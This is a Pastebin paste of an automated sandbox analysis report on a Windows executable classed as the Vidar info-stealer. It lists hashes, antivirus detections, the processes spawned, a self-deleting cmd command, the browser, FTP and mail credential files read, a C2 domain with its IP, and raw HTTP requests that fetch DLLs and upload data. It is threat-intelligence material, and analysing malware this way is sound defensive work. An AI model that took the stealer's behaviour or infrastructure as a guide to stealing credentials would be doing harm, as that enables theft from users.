paladin316

Exes_833d7bf3c1e86cc84eea7b45b5b8e534_exe_2019-08-16_06_30.txt

Aug 16th, 2019
2,918
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 29.92 KB | None | 0 0
  1.  
  2. * MalFamily: "Vidar"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_833d7bf3c1e86cc84eea7b45b5b8e534.exe"
  7. * File Size: 794624
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "4ec3ff0b82d675e065800c802ae6ac0543d9df5d0d249cad94cfba20f70e41a3"
  10. * MD5: "833d7bf3c1e86cc84eea7b45b5b8e534"
  11. * SHA1: "f65afe47808ff8a4e3bdb8baba6797a8c179a00c"
  12. * SHA512: "67b158fdb0e7060adfa4c6c8ef726b11d5c495bfe764ee58dffbb33de4e087c7209828127708044f111977031674ed9cea52abc325c2f3c944f6ed4c47862188"
  13. * CRC32: "E9E30D71"
  14. * SSDEEP: "12288:4Tal9oS9zjpO0o0HnxE2oQwhx+sRinecoPy:d/9n7okEseUsRin5oK"
  15.  
  16. * Process Execution:
  17. "Exes_833d7bf3c1e86cc84eea7b45b5b8e534.exe",
  18. "Exes_833d7bf3c1e86cc84eea7b45b5b8e534.exe",
  19. "cmd.exe",
  20. "taskkill.exe",
  21. "services.exe",
  22. "lsass.exe",
  23. "svchost.exe",
  24. "WmiPrvSE.exe",
  25. "svchost.exe",
  26. "svchost.exe",
  27. "WerFault.exe",
  28. "WerFault.exe",
  29. "wermgr.exe",
  30. "WerFault.exe",
  31. "wermgr.exe",
  32. "taskhost.exe",
  33. "sc.exe",
  34. "svchost.exe",
  35. "taskhost.exe",
  36. "WMIADAP.exe"
  37.  
  38.  
  39. * Executed Commands:
  40. "C:\\Windows\\System32\\cmd.exe /c taskkill /im Exes_833d7bf3c1e86cc84eea7b45b5b8e534.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\Exes_833d7bf3c1e86cc84eea7b45b5b8e534.exe & exit",
  41. "C:\\Windows\\system32\\lsass.exe",
  42. "C:\\Windows\\system32\\svchost.exe -k netsvcs",
  43. "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
  44. "taskhost.exe $(Arg0)",
  45. "C:\\Windows\\system32\\sc.exe start w32time task_started",
  46. "C:\\Windows\\system32\\svchost.exe -k LocalService",
  47. "taskkill /im Exes_833d7bf3c1e86cc84eea7b45b5b8e534.exe /f",
  48. "C:\\Windows\\system32\\WerFault.exe -u -p 2024 -s 656",
  49. "C:\\Windows\\system32\\WerFault.exe -u -p 2024 -s 660",
  50. "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_43c24180bab585f43fdd46e52e31ce820b6cb_cab_04e7ddfe\"",
  51. "C:\\Windows\\system32\\WerFault.exe -u -p 204 -s 288",
  52. "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_02b472b8\""
  53.  
  54.  
  55. * Signatures Detected:
  56.  
  57. "Description": "At least one process apparently crashed during execution",
  58. "Details":
  59.  
  60.  
  61. "Description": "Creates RWX memory",
  62. "Details":
  63.  
  64.  
  65. "Description": "A process attempted to delay the analysis task.",
  66. "Details":
  67.  
  68. "Process": "WmiPrvSE.exe tried to sleep 480 seconds, actually delayed analysis time by 0 seconds"
  69.  
  70.  
  71.  
  72.  
  73. "Description": "Reads data out of its own binary image",
  74. "Details":
  75.  
  76. "self_read": "process: Exes_833d7bf3c1e86cc84eea7b45b5b8e534.exe, pid: 1088, offset: 0x00000000, length: 0x000c2000"
  77.  
  78.  
  79.  
  80.  
  81. "Description": "A process created a hidden window",
  82. "Details":
  83.  
  84. "Process": "Exes_833d7bf3c1e86cc84eea7b45b5b8e534.exe -> C:\\Users\\user\\AppData\\Local\\Temp\\Exes_833d7bf3c1e86cc84eea7b45b5b8e534.exe"
  85.  
  86.  
  87. "Process": "Exes_833d7bf3c1e86cc84eea7b45b5b8e534.exe -> C:\\Windows\\System32\\cmd.exe"
  88.  
  89.  
  90.  
  91.  
  92. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  93. "Details":
  94.  
  95. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  96.  
  97.  
  98. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  99.  
  100.  
  101. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  102.  
  103.  
  104. "suspicious_request": "http://villadubois.org/142"
  105.  
  106.  
  107. "suspicious_request": "http://villadubois.org/freebl3.dll"
  108.  
  109.  
  110. "suspicious_request": "http://villadubois.org/mozglue.dll"
  111.  
  112.  
  113. "suspicious_request": "http://villadubois.org/msvcp140.dll"
  114.  
  115.  
  116. "suspicious_request": "http://villadubois.org/nss3.dll"
  117.  
  118.  
  119. "suspicious_request": "http://villadubois.org/softokn3.dll"
  120.  
  121.  
  122. "suspicious_request": "http://villadubois.org/vcruntime140.dll"
  123.  
  124.  
  125. "suspicious_request": "http://ip-api.com/line/"
  126.  
  127.  
  128. "suspicious_request": "http://villadubois.org/"
  129.  
  130.  
  131.  
  132.  
  133. "Description": "Performs some HTTP requests",
  134. "Details":
  135.  
  136. "url": "http://villadubois.org/142"
  137.  
  138.  
  139. "url": "http://villadubois.org/freebl3.dll"
  140.  
  141.  
  142. "url": "http://villadubois.org/mozglue.dll"
  143.  
  144.  
  145. "url": "http://villadubois.org/msvcp140.dll"
  146.  
  147.  
  148. "url": "http://villadubois.org/nss3.dll"
  149.  
  150.  
  151. "url": "http://villadubois.org/softokn3.dll"
  152.  
  153.  
  154. "url": "http://villadubois.org/vcruntime140.dll"
  155.  
  156.  
  157. "url": "http://ip-api.com/line/"
  158.  
  159.  
  160. "url": "http://villadubois.org/"
  161.  
  162.  
  163.  
  164.  
  165. "Description": "Executed a process and injected code into it, probably while unpacking",
  166. "Details":
  167.  
  168. "Injection": "Exes_833d7bf3c1e86cc84eea7b45b5b8e534.exe(1088) -> Exes_833d7bf3c1e86cc84eea7b45b5b8e534.exe(2304)"
  169.  
  170.  
  171.  
  172.  
  173. "Description": "Deletes its original binary from disk",
  174. "Details":
  175.  
  176.  
  177. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  178. "Details":
  179.  
  180. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 8417738 times"
  181.  
  182.  
  183.  
  184.  
  185. "Description": "Steals private information from local Internet browsers",
  186. "Details":
  187.  
  188. "file": "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\Cookies\\Google Chrome_Default.txt"
  189.  
  190.  
  191. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  192.  
  193.  
  194. "file": "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\Cookies\\IE_Cookies.txt"
  195.  
  196.  
  197. "file": "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\Cookies\\Edge_Cookies.txt"
  198.  
  199.  
  200. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  201.  
  202.  
  203. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  204.  
  205.  
  206. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  207.  
  208.  
  209.  
  210.  
  211. "Description": "Collects information about installed applications",
  212. "Details":
  213.  
  214. "Program": "Google Update Helper"
  215.  
  216.  
  217. "Program": "Microsoft Excel MUI 2013"
  218.  
  219.  
  220. "Program": "Microsoft Outlook MUI 2013"
  221.  
  222.  
  223.  
  224.  
  225. "Program": "Google Chrome"
  226.  
  227.  
  228. "Program": "Adobe Flash Player 29 NPAPI"
  229.  
  230.  
  231. "Program": "Adobe Flash Player 29 ActiveX"
  232.  
  233.  
  234. "Program": "Microsoft DCF MUI 2013"
  235.  
  236.  
  237. "Program": "Microsoft Access MUI 2013"
  238.  
  239.  
  240. "Program": "Microsoft Office Proofing Tools 2013 - English"
  241.  
  242.  
  243. "Program": "Adobe Acrobat Reader DC"
  244.  
  245.  
  246. "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xef\\xbf\\xb1ol"
  247.  
  248.  
  249. "Program": "Microsoft Publisher MUI 2013"
  250.  
  251.  
  252. "Program": "Outils de v\\xef\\xbf\\xa9rification linguistique 2013 de Microsoft Office\\xef\\xbe\\xa0- Fran\\xef\\xbf\\xa7ais"
  253.  
  254.  
  255. "Program": "Microsoft Office Shared MUI 2013"
  256.  
  257.  
  258. "Program": "Microsoft Office OSM MUI 2013"
  259.  
  260.  
  261. "Program": "Microsoft InfoPath MUI 2013"
  262.  
  263.  
  264. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
  265.  
  266.  
  267. "Program": "Microsoft Word MUI 2013"
  268.  
  269.  
  270. "Program": "Microsoft Groove MUI 2013"
  271.  
  272.  
  273.  
  274.  
  275. "Program": "Microsoft Access Setup Metadata MUI 2013"
  276.  
  277.  
  278. "Program": "Microsoft Office OSM UX MUI 2013"
  279.  
  280.  
  281. "Program": "Java Auto Updater"
  282.  
  283.  
  284. "Program": "Microsoft PowerPoint MUI 2013"
  285.  
  286.  
  287. "Program": "Microsoft Office Professional Plus 2013"
  288.  
  289.  
  290. "Program": "Adobe Refresh Manager"
  291.  
  292.  
  293. "Program": "Microsoft Office Proofing 2013"
  294.  
  295.  
  296. "Program": "Microsoft Lync MUI 2013"
  297.  
  298.  
  299.  
  300.  
  301. "Program": "Microsoft OneNote MUI 2013"
  302.  
  303.  
  304.  
  305.  
  306. "Description": "File has been identified by 13 Antiviruses on VirusTotal as malicious",
  307. "Details":
  308.  
  309. "FireEye": "Generic.mg.833d7bf3c1e86cc8"
  310.  
  311.  
  312. "Symantec": "ML.Attribute.HighConfidence"
  313.  
  314.  
  315. "APEX": "Malicious"
  316.  
  317.  
  318. "NANO-Antivirus": "Virus.Win32.Gen.ccmw"
  319.  
  320.  
  321. "Microsoft": "Backdoor:Win32/Predator.J!MTB"
  322.  
  323.  
  324. "Endgame": "malicious (high confidence)"
  325.  
  326.  
  327. "VBA32": "TScope.Malware-Cryptor.SB"
  328.  
  329.  
  330. "Cylance": "Unsafe"
  331.  
  332.  
  333. "ESET-NOD32": "a variant of Win32/Kryptik.GVMZ"
  334.  
  335.  
  336. "Rising": "[email protected] (RDML:Xwq9fj8cHgkPZbF/RF981g)"
  337.  
  338.  
  339. "SentinelOne": "DFI - Suspicious PE"
  340.  
  341.  
  342. "Fortinet": "W32/Kryptik.GVJT!tr"
  343.  
  344.  
  345. "Qihoo-360": "HEUR/QVM10.1.39BD.Malware.Gen"
  346.  
  347.  
  348.  
  349.  
  350. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  351. "Details":
  352.  
  353.  
  354. "Description": "Checks the system manufacturer, likely for anti-virtualization",
  355. "Details":
  356.  
  357.  
  358. "Description": "Harvests credentials from local FTP client softwares",
  359. "Details":
  360.  
  361. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  362.  
  363.  
  364.  
  365.  
  366. "Description": "Harvests information related to installed instant messenger clients",
  367. "Details":
  368.  
  369. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  370.  
  371.  
  372.  
  373.  
  374. "Description": "Harvests information related to installed mail clients",
  375. "Details":
  376.  
  377. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003"
  378.  
  379.  
  380. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000007"
  381.  
  382.  
  383. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000006"
  384.  
  385.  
  386. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000005"
  387.  
  388.  
  389. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004"
  390.  
  391.  
  392. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000009"
  393.  
  394.  
  395. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000008"
  396.  
  397.  
  398.  
  399.  
  400. "Description": "Collects information to fingerprint the system",
  401. "Details":
  402.  
  403.  
  404. "Description": "Created network traffic indicative of malicious activity",
  405. "Details":
  406.  
  407. "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
  408.  
  409.  
  410.  
  411.  
  412.  
  413. * Started Service:
  414. "VaultSvc",
  415. "WerSvc",
  416. "Winmgmt",
  417. "W32Time"
  418.  
  419.  
  420. * Mutexes:
  421. "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963",
  422. "Local\\WERReportingForProcess2024",
  423. "DBWinMutex",
  424. "Global\\\\xe5\\x88\\x90\\xc2\\x82",
  425. "Global\\\\xe1\\x9f\\xb0\\xc7\\x8e",
  426. "WERUI_APPCRASH-43c24180bab585f43fdd46e52e31ce820b6cb",
  427. "Local\\WERReportingForProcess204",
  428. "Global\\\\xe5\\x88\\x90\\xc2\\x8d",
  429. "Global\\\\xed\\x95\\xb0\\xc7\\x94",
  430. "WERUI_BEX64-eb71ef964c95de5826f5dbf6417783430b96dd1",
  431. "Global\\ADAP_WMI_ENTRY"
  432.  
  433.  
  434. * Modified Files:
  435. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\passwords.txt",
  436. "C:\\ProgramData\\freebl3.dll",
  437. "C:\\ProgramData\\mozglue.dll",
  438. "C:\\ProgramData\\msvcp140.dll",
  439. "C:\\ProgramData\\nss3.dll",
  440. "C:\\ProgramData\\softokn3.dll",
  441. "C:\\ProgramData\\vcruntime140.dll",
  442. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\ld",
  443. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\historych",
  444. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\History\\Google Chrome_Default.txt",
  445. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\Downloads\\Google Chrome_Default.txt",
  446. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\c",
  447. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\Cookies\\Google Chrome_Default.txt",
  448. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\wd",
  449. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\Autofill\\Google Chrome_Default.txt",
  450. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\CC\\Google Chrome_Default.txt",
  451. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\Soft\\Authy\\\\xef\\xa1\\xb0mata",
  452. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\Cookies\\IE_Cookies.txt",
  453. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\Cookies\\Edge_Cookies.txt",
  454. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\cookie_list.txt",
  455. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\outlook.txt",
  456. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\information.txt",
  457. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\Files\\default.zip",
  458. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\screenshot.jpg",
  459. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\US_00000000-0000-0000-0000-0000000000002248404598.zip",
  460. "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
  461. "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
  462. "C:\\Windows\\sysnative\\LogFiles\\Scm\\c4a16b32-1ab1-4b4d-8b4e-ab40140a3a25",
  463. "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
  464. "C:\\Windows\\Temp\\WER7423.tmp.appcompat.txt",
  465. "C:\\Windows\\Temp\\WER7491.tmp.WERInternalMetadata.xml",
  466. "C:\\Windows\\Temp\\WER74D0.tmp.WERDataCollectionFailure.txt",
  467. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_43c24180bab585f43fdd46e52e31ce820b6cb_cab_04e7ddfe\\WER7423.tmp.appcompat.txt",
  468. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_43c24180bab585f43fdd46e52e31ce820b6cb_cab_04e7ddfe\\WER7491.tmp.WERInternalMetadata.xml",
  469. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_43c24180bab585f43fdd46e52e31ce820b6cb_cab_04e7ddfe\\WER74D0.tmp.WERDataCollectionFailure.txt",
  470. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_43c24180bab585f43fdd46e52e31ce820b6cb_cab_04e7ddfe\\Report.wer",
  471. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_43c24180bab585f43fdd46e52e31ce820b6cb_cab_04e7ddfe\\Report.wer.tmp",
  472. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  473. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAB7A.tmp.appcompat.txt",
  474. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC01C.tmp.WERInternalMetadata.xml",
  475. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC05B.tmp.hdmp",
  476. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC8D8.tmp.mdmp",
  477. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_02b472b8\\WERAB7A.tmp.appcompat.txt",
  478. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_02b472b8\\WERC01C.tmp.WERInternalMetadata.xml",
  479. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_02b472b8\\WERC05B.tmp.hdmp",
  480. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_02b472b8\\WERC8D8.tmp.mdmp",
  481. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_02b472b8\\Report.wer",
  482. "\\??\\PIPE\\lsarpc",
  483. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_02b472b8\\Report.wer.tmp"
  484.  
  485.  
  486. * Deleted Files:
  487. "C:\\ProgramData\\freebl3.dll",
  488. "C:\\ProgramData\\mozglue.dll",
  489. "C:\\ProgramData\\msvcp140.dll",
  490. "C:\\ProgramData\\nss3.dll",
  491. "C:\\ProgramData\\softokn3.dll",
  492. "C:\\ProgramData\\vcruntime140.dll",
  493. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\Autofill\\Google Chrome_Default.txt",
  494. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\Autofill",
  495. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\CC\\Google Chrome_Default.txt",
  496. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\CC",
  497. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\Cookies\\Edge_Cookies.txt",
  498. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\Cookies\\Google Chrome_Default.txt",
  499. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\Cookies\\IE_Cookies.txt",
  500. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\Cookies",
  501. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\cookie_list.txt",
  502. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\Downloads\\Google Chrome_Default.txt",
  503. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\Downloads",
  504. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\Files\\default.zip",
  505. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\Files",
  506. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\History\\Google Chrome_Default.txt",
  507. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\History",
  508. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\information.txt",
  509. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\outlook.txt",
  510. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\passwords.txt",
  511. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\screenshot.jpg",
  512. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\Soft\\Authy",
  513. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\files\\Soft",
  514. "C:\\ProgramData\\2HE9V5E81O4HK2EEK6XH9XAC6\\US_00000000-0000-0000-0000-0000000000002248404598.zip",
  515. "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_833d7bf3c1e86cc84eea7b45b5b8e534.exe",
  516. "C:\\Windows\\Temp\\WER7423.tmp",
  517. "C:\\Windows\\Temp\\WER7423.tmp.appcompat.txt",
  518. "C:\\Windows\\Temp\\WER7491.tmp",
  519. "C:\\Windows\\Temp\\WER7491.tmp.WERInternalMetadata.xml",
  520. "C:\\Windows\\Temp\\WER74D0.tmp",
  521. "C:\\Windows\\Temp\\WER74D0.tmp.WERDataCollectionFailure.txt",
  522. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_43c24180bab585f43fdd46e52e31ce820b6cb_cab_04e7ddfe\\Report.wer.tmp",
  523. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAB7A.tmp",
  524. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAB7A.tmp.appcompat.txt",
  525. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC01C.tmp",
  526. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC01C.tmp.WERInternalMetadata.xml",
  527. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC05B.tmp",
  528. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC05B.tmp.hdmp",
  529. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC8D8.tmp",
  530. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC8D8.tmp.mdmp",
  531. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_02b472b8\\Report.wer.tmp"
  532.  
  533.  
  534. * Modified Registry Keys:
  535. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
  536. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  537. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
  538. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug",
  539. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\ExceptionRecord",
  540. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
  541. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
  542. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug",
  543. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\StoreLocation",
  544. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\StoreLocation",
  545. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\StoreLocation",
  546. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
  547. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining"
  548.  
  549.  
  550. * Deleted Registry Keys:
  551.  
  552. * DNS Communications:
  553.  
  554. "type": "A",
  555. "request": "villadubois.org",
  556. "answers":
  557.  
  558. "data": "185.99.133.219",
  559. "type": "A"
  560.  
  561.  
  562.  
  563.  
  564. "type": "A",
  565. "request": "ip-api.com",
  566. "answers":
  567.  
  568. "data": "72.11.140.50",
  569. "type": "A"
  570.  
  571.  
  572. "data": "66.212.29.250",
  573. "type": "A"
  574.  
  575.  
  576.  
  577.  
  578.  
  579. * Domains:
  580.  
  581. "ip": "185.99.133.219",
  582. "domain": "villadubois.org"
  583.  
  584.  
  585. "ip": "66.212.29.250",
  586. "domain": "ip-api.com"
  587.  
  588.  
  589.  
  590. * Network Communication - ICMP:
  591.  
  592. * Network Communication - HTTP:
  593.  
  594. "count": 1,
  595. "body": "--1BEF0A57BE110FD467A--\r\n",
  596. "uri": "http://villadubois.org/142",
  597. "user-agent": "",
  598. "method": "POST",
  599. "host": "villadubois.org",
  600. "version": "1.1",
  601. "path": "/142",
  602. "data": "POST /142 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: villadubois.org\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  603. "port": 80
  604.  
  605.  
  606. "count": 1,
  607. "body": "",
  608. "uri": "http://villadubois.org/freebl3.dll",
  609. "user-agent": "",
  610. "method": "GET",
  611. "host": "villadubois.org",
  612. "version": "1.1",
  613. "path": "/freebl3.dll",
  614. "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: villadubois.org\r\nConnection: Keep-Alive\r\n\r\n",
  615. "port": 80
  616.  
  617.  
  618. "count": 1,
  619. "body": "",
  620. "uri": "http://villadubois.org/mozglue.dll",
  621. "user-agent": "",
  622. "method": "GET",
  623. "host": "villadubois.org",
  624. "version": "1.1",
  625. "path": "/mozglue.dll",
